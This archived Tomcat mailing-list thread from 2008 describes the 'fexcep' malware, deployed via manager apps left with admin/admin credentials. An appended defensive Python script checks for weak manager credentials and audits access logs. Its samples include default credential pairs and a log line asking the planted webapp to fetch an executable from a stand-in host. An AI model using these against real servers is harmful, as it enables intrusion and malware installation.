Posted to users@tomcat.apache.org by ic547 <ic...@yahoo.com> on 2008/10/04 13:12:56 UTC

Re: Possible hack tool kit on tomcat 6.0.16

I have encountered this in September 2008.  Here is what I have found:

1)  There are several variants such as: fexcep OR fexcepkillshell OR
fexcepshell OR fexcepspshell OR fexception OR fexshell OR fexsshell

2)  It appears to be distributed using an automated scanner that looks for
the manager app running on Tomcat port 8080 with the default password still
intact: admin / admin

3)  The code deploys a webapp to Tomcat that:
a)  Checks if the OS is Windows.  If not, it terminates.
b)  If it is Windows... then some variants immediately download and execute
a binary from one of several possible servers.  The binary presumably
contains further malware.
c)  Other variants apparently wait to be invoked again by an external host
that will provide the URL of a binary to download and execute.

THE SAFEGUARD AGAINST THIS IS TO CHANGE THE DEFAULT TOMCAT MANAGER APP
PASSWORD.  Or you could delete the manager webapp.


Mehrotra, Anurag wrote:
> 
> I just came across 2 war files within tomcat6.0/webapps folder:
> 
> fexcep.war and safe2.war. Both applications were deployed.
> 
> I was watching the thread "Possible virus uploaded to Tomcat 5.5.3" very
> closely so the presence of these files alerted me.
> 
> Like the original thread nobody has access to the server except through
> vpn
> and port 80/443 (Apache httpd is handing all traffic with mod_jk)
> 
> Versions: Apache httpd 2.0.59
>           mod_ssl      2.0.59
>           OpenSSL      0.9.7
>           mod_jk       1.2.26
>           Tomcat       6.0.16
> 
> OS:       Windows 2003
> 
> I am attaching one of the war files here: fexcep.war
> 
> I have verified that my server.xml and web.xml were not tampered with
> (original date/timestamp as when I installed mod_jk).
> 
> Could there be some kind of backdoor entry happening in the code?
> 
> Thanks,
> 
>  <<fexcep.war>> 
> ________________________________
> Anurag			301-296-3838
> 
> The information contained in this message may be privileged and
> confidential
> and protected from disclosure.  If the reader of this message is not the
> intended recipient, or an employee or agent responsible for delivering
> this
> message to the intended recipient, you are hereby notified that any
> dissemination, distribution or copying of this communication is strictly
> prohibited. If you have received this communication in error, please
> notify
> us immediately by replying to the message and deleting it from your
> computer.
> 
> 
> 
> ---------------------------------------------------------------------
> To start a new topic, e-mail: users@tomcat.apache.org
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
> 

-- 
View this message in context: http://www.nabble.com/Possible-hack-tool-kit-on-tomcat-6.0.16-tp18928896p19811090.html
Sent from the Tomcat - User mailing list archive at Nabble.com.




Re: Possible hack tool kit on tomcat 6.0.16

Posted by Mark Thomas <ma...@apache.org>.
ic547 wrote:
> I have encountered this in September 2008.  Here is what I have found:
> 
> 1)  There are several variants such as: fexcep OR fexcepkillshell OR
> fexcepshell OR fexcepspshell OR fexception OR fexshell OR fexsshell
> 
> 2)  It appears to be distributed using an automated scanner that looks for
> the manager app running on Tomcat port 8080 with the default password still
> intact: admin / admin
> 
> 3)  The code deploys a webapp to Tomcat that:
> a)  Checks if the OS is windows.  If not it terminates.
> b)  If it is windows... then some variants immediately download and execute
> a binary from one of several possible servers.  The binary presumably
> contains further malware.
> c)  Other variants apparently wait to be invoked again by an external host
> that will provide the URL of a binary to download and execute.
> 
> THE SAFEGUARD AGAINST THIS IS TO CHANGE THE DEFAULT TOMCAT MANAGER APP
> PASSWORD.  Or you could delete the manager webapp.

To be clear:
- there is no default manager app password
- the manager app is disabled by default.

My previous advice on this topic still stands:
http://markmail.org/message/jrqw75yw3d3xh3p6

Mark


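An added example, not code from this thread or from the Tomcat project: a small Python triage script covering the two things the thread turns on. It checks a tomcat-users.xml for accounts that hold a manager role and whether their credentials are a pair an automated manager-app scanner would try (admin/admin as reported by ic547; the other pairs are assumptions based on the examples Tomcat ships commented out), and it reads the access log of the 8080 connector for deployments made through the manager app and for later hits on the fexcep-family context names, which is how the "wait to be invoked" variants would show up. The tomcat-users.xml content and the log lines are constructed samples, not the poster's files; the `url` query parameter on the invocation request and the addresses 10.0.0.5 and 203.0.113.9 are likewise assumed. Tomcat 6 uses the single role name "manager"; later versions split it into manager-gui, manager-script and so on, so the check matches either form.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Context names reported in this thread (ic547's variant list plus the two
# WARs the original poster found).
KNOWN_BAD_CONTEXTS = {
    "fexcep", "fexcepkillshell", "fexcepshell", "fexcepspshell",
    "fexception", "fexshell", "fexsshell", "safe2",
}

# Credential pairs a manager-app scanner would try. admin/admin is the pair the
# thread names; the rest are assumptions (the examples shipped commented out in
# tomcat-users.xml, plus an empty password).
WEAK_CREDENTIALS = {
    ("admin", "admin"), ("admin", ""), ("admin", "tomcat"), ("tomcat", "tomcat"),
    ("tomcat", "admin"), ("manager", "manager"), ("role1", "tomcat"), ("both", "tomcat"),
}

# Constructed sample tomcat-users.xml (not the poster's file): the shipped
# examples have been enabled and an admin/admin account given the manager role.
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager"/>
  <role rolename="tomcat"/>
  <user username="admin" password="admin" roles="manager"/>
  <user username="deploy" password="Zq7!pL4#vR2w" roles="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
</tomcat-users>
"""

# Constructed access-log lines in Tomcat's "common" pattern for the 8080
# connector (not from the thread): a scanner authenticates as admin, deploys
# two WARs through the manager text API, then returns to invoke one of them.
# The "url" parameter name is an assumption about how a download URL is passed.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [04/Oct/2008:02:11:03 +0000] "GET /manager/html HTTP/1.1" 401 -
10.0.0.5 - admin [04/Oct/2008:02:11:04 +0000] "GET /manager/list HTTP/1.1" 200 93
10.0.0.5 - admin [04/Oct/2008:02:11:06 +0000] "PUT /manager/deploy?path=/fexcep HTTP/1.1" 200 45
10.0.0.5 - admin [04/Oct/2008:02:11:08 +0000] "PUT /manager/deploy?path=/safe2 HTTP/1.1" 200 44
192.168.1.20 - - [04/Oct/2008:09:30:11 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 5120
10.0.0.5 - - [04/Oct/2008:11:47:52 +0000] "GET /fexcep/index.jsp?url=http://203.0.113.9/x.exe HTTP/1.1" 200 12
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def manager_users(xml_text):
    """Return [(username, password, is_weak)] for every user holding a manager role.

    Matches Tomcat 6's "manager" role and the "manager-*" roles of later versions.
    """
    root = ET.fromstring(xml_text)
    found = []
    for user in root.iter("user"):
        name = user.get("username") or user.get("name") or ""
        password = user.get("password") or ""
        roles = {r.strip() for r in (user.get("roles") or "").split(",") if r.strip()}
        if any(r == "manager" or r.startswith("manager-") for r in roles):
            found.append((name, password, (name, password) in WEAK_CREDENTIALS))
    return found


def review_access_log(text):
    """Return (deploys, invocations).

    deploys: (ip, user, context, status) for requests that deploy through the
    manager app. invocations: (ip, method, target, status) for any request whose
    first path segment is one of the known-bad context names.
    """
    deploys, invocations = [], []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        segs = [s for s in target.path.split("/") if s]
        status = int(m["status"])
        if len(segs) >= 2 and segs[0] == "manager" and segs[1] in ("deploy", "install"):
            # Text API: PUT /manager/deploy?path=/ctx with the WAR in the body, or
            # GET /manager/deploy?path=/ctx&war=...; /manager/install is the older alias.
            ctx = parse_qs(target.query).get("path", ["(no path parameter)"])[0]
            deploys.append((m["ip"], m["user"], ctx, status))
        elif segs[:3] == ["manager", "html", "upload"]:
            # HTML interface: the WAR name travels in the multipart body, not the request line.
            deploys.append((m["ip"], m["user"], "(uploaded WAR)", status))
        elif segs and segs[0] in KNOWN_BAD_CONTEXTS:
            invocations.append((m["ip"], m["method"], m["target"], status))
    return deploys, invocations


def main():
    for name, _password, weak in manager_users(SAMPLE_TOMCAT_USERS):
        print(f"manager role held by {name!r}: {'WEAK credentials' if weak else 'ok'}")
    deploys, invocations = review_access_log(SAMPLE_ACCESS_LOG)
    for ip, user, ctx, status in deploys:
        flag = "  <-- known-bad context name" if ctx.lstrip("/") in KNOWN_BAD_CONTEXTS else ""
        print(f"manager deploy of {ctx} by {user}@{ip} -> {status}{flag}")
    for ip, method, target, status in invocations:
        print(f"invocation of deployed context: {method} {target} from {ip} -> {status}")


if __name__ == "__main__":
    main()
```

Run it against the real files by swapping in the contents of conf/tomcat-users.xml and the access log written for the 8080 connector (an AccessLogValve has to be enabled on that connector's Host for the log to exist); a manager deploy from an address that is not your own deployment host, or any hit on one of the listed context names, is the thing to chase. The password check only makes sense for clear-text passwords in tomcat-users.xml; if the realm stores digests, the pair comparison will not match and the script only reports who holds the role.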